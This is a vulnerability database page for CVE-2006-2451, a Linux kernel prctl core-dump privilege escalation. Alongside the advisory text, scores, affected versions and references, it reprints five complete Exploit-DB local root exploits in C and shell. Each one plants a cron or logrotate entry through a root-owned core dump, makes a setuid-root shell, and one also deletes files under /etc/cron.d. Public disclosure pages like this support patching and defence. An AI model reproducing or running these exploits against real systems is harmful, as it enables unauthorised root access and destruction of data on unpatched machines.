English
Français
Light
Dark
System

Alert System

Stay informed at all times
Create an account Open a free account Login Manage your alerts

CVE-2006-2451 : Detail

CVE-2006-2451

0.04%V3
Local
2006-07-07 16:00 +00:00
2018-10-18 12:57 +00:00
CVE.org
NVD

Alert for a CVE

Stay informed of any changes for a specific CVE.
Alert management

Descriptions

The suid_dumpable support in Linux kernel 2.6.13 up to versions before 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial of service (disk consumption) and possibly gain privileges via the PR_SET_DUMPABLE argument of the prctl function and a program that causes a core dump file to be created in a directory for which the user does not have permissions.

Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Metrics

Metric Score Severity CVSS Vector Source
V2 4.6 AV:L/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 2031

Publication date : 2006-07-17 22:00 +00:00
Author : Marco Ivaldi
EDB Verified : Yes

/* * $Id: raptor_prctl2.c,v 1.3 2006/07/18 13:16:45 raptor Exp $ * * raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate) * Copyright (c) 2006 Marco Ivaldi * * The suid_dumpable support in Linux kernel 2.6.13 up to versions before * 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial * of service (disk consumption) and POSSIBLY (yeah, sure;) gain privileges via * the PR_SET_DUMPABLE argument of the prctl function and a program that causes * a core dump file to be created in a directory for which the user does not * have permissions (CVE-2006-2451). * * This exploit uses the logrotate attack vector: of course, you must be able * to chdir() into the /etc/logrotate.d directory in order to exploit the * vulnerability. I've experimented a bit with other attack vectors as well, * with no luck: at (/var/spool/atjobs/) uses file name information to * establish execution time, /etc/cron.hourly|daily|weekly|monthly want +x * permissions, xinetd (/etc/xinetd.d) puked out the crafted garbage-filled * coredump (see also http://www.0xdeadbeef.info/exploits/raptor_prctl.c). * * Thanks to Solar Designer for the interesting discussion on attack vectors. * * NOTE THAT IN ORDER TO WORK THIS EXPLOIT *MUST* BE STATICALLY LINKED!!! * * Usage: * $ gcc raptor_prctl2.c -o raptor_prctl2 -static -Wall * [exploit must be statically linked] * $ ./raptor_prctl2 * [please wait until logrotate is run] * $ ls -l /tmp/pwned * -rwsr-xr-x 1 root users 7221 2006-07-18 13:32 /tmp/pwned * $ /tmp/pwned * sh-3.00# id * uid=0(root) gid=0(root) groups=16(dialout),33(video),100(users) * sh-3.00# * [don't forget to delete /tmp/pwned!] * * Vulnerable platforms: * Linux from 2.6.13 up to 2.6.17.4 [tested on SuSE Linux 2.6.13-15.8-default] */ #include #include #include #include #include #include #include #define INFO1 "raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)" #define INFO2 "Copyright (c) 2006 Marco Ivaldi " char payload[] = /* commands to be executed by privileged logrotate */ "\n/var/log/core {\n daily\n size=0\n firstaction\n chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/logrotate.d/core; rm -f /var/log/core*\n endscript\n}\n"; char pwnage[] = /* build setuid() helper to circumvent bash checks */ "echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c"; int main(void) { int pid; struct rlimit corelimit; struct stat st; /* print exploit information */ fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); /* prepare the setuid() helper */ system(pwnage); /* set core size to unlimited */ corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit); /* let's create a fake logfile in /var/log */ if (!(pid = fork())) { chdir("/var/log"); prctl(PR_SET_DUMPABLE, 2); sleep(666); exit(1); } kill(pid, SIGSEGV); /* let's do the PR_SET_DUMPABLE magic */ if (!(pid = fork())) { chdir("/etc/logrotate.d"); prctl(PR_SET_DUMPABLE, 2); sleep(666); exit(1); } kill(pid, SIGSEGV); /* did it work? */ sleep(3); if ((stat("/var/log/core", &st) < 0) || (stat("/etc/logrotate.d/core", &st) < 0)) { fprintf(stderr, "Error: Not vulnerable? See comments.\n"); exit(1); } /* total pwnage */ fprintf(stderr, "Please wait until logrotate is run and check /tmp/pwned;)\n"); exit(0); } // milw0rm.com [2006-07-18]
Exploit Database EDB-ID : 2004

Publication date : 2006-07-10 22:00 +00:00
Author : dreyer & RoMaNSoFt
EDB Verified : Yes

/*****************************************************/ /* Local r00t Exploit for: */ /* Linux Kernel PRCTL Core Dump Handling */ /* ( BID 18874 / CVE-2006-2451 ) */ /* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */ /* By: */ /* - dreyer (main PoC code) */ /* - RoMaNSoFt (local root code) */ /* [ 10.Jul.2006 ] */ /*****************************************************/ #include #include #include #include #include #include #include #include char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n"; int main() { int child; struct rlimit corelimit; printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n"); printf("By: dreyer & RoMaNSoFt\n"); printf("[ 10.Jul.2006 ]\n\n"); corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit); printf("[*] Creating Cron entry\n"); if ( !( child = fork() )) { chdir("/etc/cron.d"); prctl(PR_SET_DUMPABLE, 2); sleep(200); exit(1); } kill(child, SIGSEGV); printf("[*] Sleeping for aprox. one minute (** please wait **)\n"); sleep(62); printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n"); system("/tmp/sh -i"); } // milw0rm.com [2006-07-11]
Exploit Database EDB-ID : 2005

Publication date : 2006-07-11 22:00 +00:00
Author : Julien Tinnes
EDB Verified : Yes

/* Linux >= 2.6.13 prctl kernel exploit * * (C) Julien TINNES * * If you read the Changelog from 2.6.13 you've probably seen: * [PATCH] setuid core dump * * This patch mainly adds suidsafe to suid_dumpable sysctl but also a new per process, * user setable argument to PR_SET_DUMPABLE. * * This flaw allows us to create a root owned coredump into any directory. * This is trivially exploitable. * */ #include #include #include #include #include #include #include #include #include #include #define CROND "/etc/cron.d" #define BUFSIZE 2048 struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY}; char crontemplate[]= "#/etc/cron.d/core suid_dumpable exploit\n" "SHELL=/bin/sh\n" "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n" "#%s* * * * * root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n"; char cronstring[BUFSIZE]; char fname[BUFSIZE]; struct timeval te; void sh(int sn) { execl(fname, fname, (char *) NULL); } int main(int argc, char *argv[]) { int nw, pid; if (geteuid() == 0) { printf("[+] getting root shell\n"); setuid(0); setgid(0); if (execl("/bin/sh", "/bin/sh", (char *) NULL)) { perror("[-] execle"); return 1; } } printf("\nprctl() suidsafe exploit\n\n(C) Julien TINNES\n\n"); /* get our file name */ if (readlink("/proc/self/exe", fname, sizeof(fname)) == -1) { perror("[-] readlink"); printf("This is not fatal, rewrite the exploit\n"); } if (signal(SIGUSR1, sh) == SIG_ERR) { perror("[-] signal"); return 1; } printf("[+] Installed signal handler\n"); /* Let us create core files */ setrlimit(RLIMIT_CORE, &myrlimit); if (chdir(CROND) == -1) { perror("[-] chdir"); return 1; } /* exploit the flaw */ if (prctl(PR_SET_DUMPABLE, 2) == -1) { perror("[-] prtctl"); printf("Is you kernel version >= 2.6.13 ?\n"); return 1; } printf("[+] We are suidsafe dumpable!\n"); /* Forge the string for our core dump */ nw=snprintf(cronstring, sizeof(cronstring), crontemplate, "\n", fname, fname, CROND"/core", getpid()); if (nw >= sizeof(cronstring)) { printf("[-] cronstring is too small\n"); return 1; } printf("[+] Malicious string forged\n"); if ((pid=fork()) == -1) { perror("[-] fork"); return 1; } if (pid == 0) { /* This is not the good way to do it ;) */ sleep(120); exit(0); } /* SEGFAULT the child */ printf("[+] Segfaulting child\n"); if (kill(pid, 11) == -1) { perror("[-] kill"); return 1; } if (gettimeofday(&te, NULL) == 0) printf("[+] Waiting for exploit to succeed (~%ld seconds)\n", 60 - (te.tv_sec%60)); sleep(120); printf("[-] It looks like the exploit failed\n"); return 1; } // milw0rm.com [2006-07-12]
Exploit Database EDB-ID : 2006

Publication date : 2006-07-12 22:00 +00:00
Author : Marco Ivaldi
EDB Verified : Yes

/* * $Id: raptor_prctl.c,v 1.1 2006/07/13 14:21:43 raptor Exp $ * * raptor_prctl.c - Linux 2.6.x suid_dumpable vulnerability * Copyright (c) 2006 Marco Ivaldi * * The suid_dumpable support in Linux kernel 2.6.13 up to versions before * 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial * of service (disk consumption) and POSSIBILY (yeah, sure;) gain privileges * via the PR_SET_DUMPABLE argument of the prctl function and a program that * causes a core dump file to be created in a directory for which the user does * not have permissions (CVE-2006-2451). * * Berlin, Sunday July 9th 2006: CAMPIONI DEL MONDO! CAMPIONI DEL MONDO! * CAMPIONI DEL MONDO! (i was tempted to name this exploit "pajolo.c";)) * * Greets to Paul Starzetz and Roman Medina, who also exploited this ugly bug. * * NOTE. This exploit uses the Vixie's crontab /etc/cron.d attack vector: this * means that distributions that use a different configuration (namely Dillon's * crontab on Slackware Linux) can be vulnerable but not directly exploitable. * * Usage: * $ gcc raptor_prctl.c -o raptor_prctl -Wall * [exploit must be dinamically linked] * $ ./raptor_prctl * [...] * sh-3.00# * * Vulnerable platforms: * Linux from 2.6.13 up to 2.6.17.4 [tested on SuSE Linux 2.6.13-15.8-default] */ #include #include #include #include #include #include #include #define INFO1 "raptor_prctl.c - Linux 2.6.x suid_dumpable vulnerability" #define INFO2 "Copyright (c) 2006 Marco Ivaldi " char payload[] = /* commands to be executed by privileged crond */ "\nSHELL=/bin/sh\nPATH=/usr/bin:/usr/sbin:/sbin:/bin\n* * * * * root chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/cron.d/core\n"; char pwnage[] = /* build setuid() helper to circumvent bash checks */ "echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c"; int main(void) { int pid, i; struct rlimit corelimit; struct stat st; /* print exploit information */ fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); /* prepare the setuid() helper */ system(pwnage); /* set core size to unlimited */ corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit); /* let's do the PR_SET_DUMPABLE magic */ if (!(pid = fork())) { chdir("/etc/cron.d"); prctl(PR_SET_DUMPABLE, 2); sleep(666); exit(1); } kill(pid, SIGSEGV); /* did it work? */ sleep(3); if (stat("/etc/cron.d/core", &st) < 0) { fprintf(stderr, "Error: Not vulnerable? See comments.\n"); exit(1); } fprintf(stderr, "Ready to uncork the champagne? "); fprintf(stderr, "Please wait a couple of minutes;)\n"); /* wait for crond to execute our evil entry */ for (i = 0; i < 124; i += 2) { if (stat("/tmp/pwned", &st) < 0) { fprintf(stderr, "\nError: Check /tmp/pwned!\n"); exit(1); } if (st.st_uid == 0) break; fprintf(stderr, "."); sleep(2); } /* timeout reached? */ if (i > 120) { fprintf(stderr, "\nTimeout: Check /tmp/pwned!\n"); exit(1); } /* total pwnage */ fprintf(stderr, "CAMPIONI DEL MONDO!\n\n"); system("/tmp/pwned"); exit(0); } // milw0rm.com [2006-07-13]
Exploit Database EDB-ID : 2011

Publication date : 2006-07-13 22:00 +00:00
Author : Sunay
EDB Verified : Yes

#!/bin/sh # # PRCTL local root exp By: Sunix # + effected systems 2.6.13<= x <=2.6.17.4 + 2.6.9-22.ELsmp # tested on Intel(R) Xeon(TM) CPU 3.20GHz # kernel 2.6.9-22.ELsmp # maybe others ... # Tx to drayer & RoMaNSoFt for their clear code... # # zmia23@yahoo.com cat > /tmp/getsuid.c << __EOF__ #include #include #include #include #include #include #include #include char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n"; int main() { int child; struct rlimit corelimit; corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit); if ( !( child = fork() )) { chdir("/etc/cron.d"); prctl(PR_SET_DUMPABLE, 2); sleep(200); exit(1); } kill(child, SIGSEGV); sleep(120); } __EOF__ cat > /tmp/s.c << __EOF__ #include main(void) { setgid(0); setuid(0); system("/bin/sh"); system("rm -rf /tmp/s"); system("rm -rf /etc/cron.d/*"); return 0; } __EOF__ echo "wait aprox 4 min to get sh" cd /tmp cc -o s s.c cc -o getsuid getsuid.c ./getsuid ./s rm -rf getsuid* rm -rf s.c rm -rf prctl.sh # milw0rm.com [2006-07-14]

Products Mentioned

Configuraton 0

Linux>>Linux_kernel >> Version 2.6.13

Linux>>Linux_kernel >> Version 2.6.13.1

Linux>>Linux_kernel >> Version 2.6.13.2

Linux>>Linux_kernel >> Version 2.6.13.3

Linux>>Linux_kernel >> Version 2.6.13.4

Linux>>Linux_kernel >> Version 2.6.13.5

Linux>>Linux_kernel >> Version 2.6.14

Linux>>Linux_kernel >> Version 2.6.14

Linux>>Linux_kernel >> Version 2.6.14

Linux>>Linux_kernel >> Version 2.6.14

Linux>>Linux_kernel >> Version 2.6.14

Linux>>Linux_kernel >> Version 2.6.14

Linux>>Linux_kernel >> Version 2.6.14.1

Linux>>Linux_kernel >> Version 2.6.14.2

Linux>>Linux_kernel >> Version 2.6.14.3

Linux>>Linux_kernel >> Version 2.6.14.4

Linux>>Linux_kernel >> Version 2.6.14.5

Linux>>Linux_kernel >> Version 2.6.14.6

Linux>>Linux_kernel >> Version 2.6.14.7

Linux>>Linux_kernel >> Version 2.6.15

Linux>>Linux_kernel >> Version 2.6.15

Linux>>Linux_kernel >> Version 2.6.15

Linux>>Linux_kernel >> Version 2.6.15

Linux>>Linux_kernel >> Version 2.6.15

Linux>>Linux_kernel >> Version 2.6.15

Linux>>Linux_kernel >> Version 2.6.15

Linux>>Linux_kernel >> Version 2.6.15

Linux>>Linux_kernel >> Version 2.6.15.1

Linux>>Linux_kernel >> Version 2.6.15.2

Linux>>Linux_kernel >> Version 2.6.15.3

Linux>>Linux_kernel >> Version 2.6.15.4

Linux>>Linux_kernel >> Version 2.6.15.5

Linux>>Linux_kernel >> Version 2.6.15.6

Linux>>Linux_kernel >> Version 2.6.15.7

Linux>>Linux_kernel >> Version 2.6.16

Linux>>Linux_kernel >> Version 2.6.16

Linux>>Linux_kernel >> Version 2.6.16

Linux>>Linux_kernel >> Version 2.6.16

Linux>>Linux_kernel >> Version 2.6.16

Linux>>Linux_kernel >> Version 2.6.16

Linux>>Linux_kernel >> Version 2.6.16

Linux>>Linux_kernel >> Version 2.6.16.1

Linux>>Linux_kernel >> Version 2.6.16.2

Linux>>Linux_kernel >> Version 2.6.16.3

Linux>>Linux_kernel >> Version 2.6.16.4

Linux>>Linux_kernel >> Version 2.6.16.5

Linux>>Linux_kernel >> Version 2.6.16.6

Linux>>Linux_kernel >> Version 2.6.16.7

Linux>>Linux_kernel >> Version 2.6.16.8

Linux>>Linux_kernel >> Version 2.6.16.9

Linux>>Linux_kernel >> Version 2.6.16.10

Linux>>Linux_kernel >> Version 2.6.16.11

Linux>>Linux_kernel >> Version 2.6.16.12

Linux>>Linux_kernel >> Version 2.6.16.13

Linux>>Linux_kernel >> Version 2.6.16.14

Linux>>Linux_kernel >> Version 2.6.16.15

Linux>>Linux_kernel >> Version 2.6.16.16

Linux>>Linux_kernel >> Version 2.6.16.17

Linux>>Linux_kernel >> Version 2.6.16.18

Linux>>Linux_kernel >> Version 2.6.16.19

Linux>>Linux_kernel >> Version 2.6.16.20

Linux>>Linux_kernel >> Version 2.6.16.21

Linux>>Linux_kernel >> Version 2.6.16.22

Linux>>Linux_kernel >> Version 2.6.16.23

Linux>>Linux_kernel >> Version 2.6.17

Linux>>Linux_kernel >> Version 2.6.17

Linux>>Linux_kernel >> Version 2.6.17

Linux>>Linux_kernel >> Version 2.6.17

Linux>>Linux_kernel >> Version 2.6.17

Linux>>Linux_kernel >> Version 2.6.17

Linux>>Linux_kernel >> Version 2.6.17

Linux>>Linux_kernel >> Version 2.6.17.1

Linux>>Linux_kernel >> Version 2.6.17.2

Linux>>Linux_kernel >> Version 2.6.17.3

References

http://www.redhat.com/support/errata/RHSA-2006-0574.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.vupen.com/english/advisories/2006/2699
Tags : vdb-entry, x_refsource_VUPEN
http://securitytracker.com/id?1016451
Tags : vdb-entry, x_refsource_SECTRACK
http://secunia.com/advisories/20965
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/18874
Tags : vdb-entry, x_refsource_BID
http://www.ubuntu.com/usn/usn-311-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://www.osvdb.org/27030
Tags : vdb-entry, x_refsource_OSVDB
http://secunia.com/advisories/21966
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/20953
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/21498
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/20986
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/20991
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/20960
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/21179
Tags : third-party-advisory, x_refsource_SECUNIA

More information
Click on the button to the left (OFF), to authorize the inscription of cookie improving the functionalities of the site. Click on the button to the left (Accept all), to unauthorize the inscription of cookie improving the functionalities of the site.